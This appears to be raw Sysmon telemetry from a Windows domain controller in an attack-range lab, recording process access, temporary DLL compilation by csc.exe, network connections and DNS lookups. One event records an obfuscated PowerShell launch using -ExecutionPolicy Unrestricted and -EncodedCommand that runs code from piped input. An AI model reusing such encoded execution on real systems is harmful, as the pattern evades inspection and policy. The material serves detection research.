15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CAD-5FA1-B000-000000008801}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7CAC-5FA1-AE00-000000008801}49882404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAD-5FA1-B000-000000008801}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DCA1B68F) 154100x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.452{D28789B6-7CAD-5FA1-B000-000000008801}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\mrbnyq5x.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.446{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\mrbnyq5x.cmdline2020-11-03 15:52:13.446 11241100x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:13.446{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\mrbnyq5x.dll2020-11-03 15:52:13.446 354300x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.626{D28789B6-7CAB-5FA1-A700-000000008801}3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-807.attackrange.local50317-false172.227.168.22a172-227-168-22.deploy.static.akamaitechnologies.com443https 10341000x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAD-5FA1-AF00-000000008801}2604C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CAD-5FA1-AF00-000000008801}2604C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.992{D28789B6-7CAC-5FA1-AE00-000000008801}49882404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAD-5FA1-AF00-000000008801}2604C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316532b2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af413c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af3e0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+315a5472(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ab49a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b12e72(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af64d7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af64d7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af6368(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ae82ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af4820(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af4413(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af413c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30af3e0d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+315a5472(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30adac6e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ada23e(wow64) 154100x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:13.001{D28789B6-7CAD-5FA1-AF00-000000008801}2604C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CAC-5FA1-AE00-000000008801}4988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 22542200x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.668{D28789B6-7CAB-5FA1-A700-000000008801}3280onegetcdn.azureedge.net0type: 5 onegetcdn.ec.azureedge.net;type: 5 cs9.wpc.v0cdn.net;::ffff:152.199.19.161;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:14.542{D28789B6-7CAE-5FA1-B300-000000008801}1356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\4j4ssjqy\4j4ssjqy.dll2020-11-03 15:52:14.448 10341000x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:14.526{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAE-5FA1-B400-000000008801}2608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 